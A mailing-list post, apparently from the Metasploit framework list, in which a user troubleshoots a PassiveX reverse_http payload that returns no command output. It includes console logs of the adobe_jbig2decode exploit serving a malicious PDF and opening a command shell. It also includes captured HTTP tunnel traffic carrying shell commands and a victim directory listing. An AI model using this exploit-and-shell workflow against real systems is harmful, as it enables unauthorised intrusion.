problem with passiveX (reverse_http) payloads: nothing in return to commands

[irian2003 at yahoo.com (Bogdan Sandu)]

Hello,

I have a problem with the reverse_http payloads.
The exploit succedes and looking with tcpdump at the traffic between the proxy server and the port of the payload I see 
the commands being executed, but after interacting with the session I see nothing returned to my commands:

----------------------------
GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Pragma: no-cache Via: 1.1 
xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive
?HTTP/1.1 200 OK Content-Length: 4 Server: Rex Connection: close?
Dir
------------------------------------
GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Pragma: no-cache Via: 1.1 
xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive 
-----------------------------------
POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Content-Length: 1024 Pragma: 
no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: 
keep-alive?
dir
?Volume in drive C has no label.  Volume Serial Number is 0CAA-3013?
?Directory of C:\Documents and Settings\irian\Desktop?
04/03/2009  11:43 PM    <DIR>          . 04/03/2009  11:43 PM    <DIR>          .. 04/01/2009  10:09 AM            
27,136 Activ.doc 02/27/2009  12:09 PM           169,984 carte optional.doc 03/07/2009  12:48 PM               131 
jboss.txt 04/02/2009  03:48 AM           288,237 lo.cap 03/30/2009  12:17 PHTTP/1.1 200 OK Content-Length: 0 Server: 
Rex Connection: Keep-Alive -----------------------------
POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Content-Length: 230 Pragma: 
no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: 
keep-alive?
M           247,666 users_guide.pdf 03/25/2009  10:32 PM            24,064 youtube.doc               15 File(s)      
2,111,721 bytes                3 Dir(s)     959,123,456 bytes free?
C:\Documents and Settings\irian\Desktop>HTTP/1.1 200 OK Content-Length: 0 Server: Rex Connection: Keep-Alive 
----------------------------------------

msf exploit(adobe_jbig2decode) > exploit
[*] Exploit running as background job.
msf exploit(adobe_jbig2decode) >
[*] PassiveX listener started.
[*] Using URL: http://0.0.0.0:8080/carti.pdf
[*]  Local IP: http://1.2.3.4:8080/carti.pdf
[*] Server started.
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 1.2.3.4:50007...
[*] Sending PassiveX main page to client
[*] Sending PassiveX main page to client
[*] Command shell session 1 opened (Local Pipe -> Remote Pipe)
[*] Sending stage to sid 2 (474 bytes)

msf exploit(adobe_jbig2decode) > sessions -l

Active sessions
===============

? Id  Description    Tunnel
? --  -----------    ------
? 1   Command shell  Local Pipe -> Remote Pipe

msf exploit(adobe_jbig2decode) > sessions -i 1
[*] Starting interaction with 1...

ls
dir
dir

Any ideeas why this is happening.Thanks a lot and keep up doing a great job.

Bogdan




      
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090403/048cef1b/attachment.htm>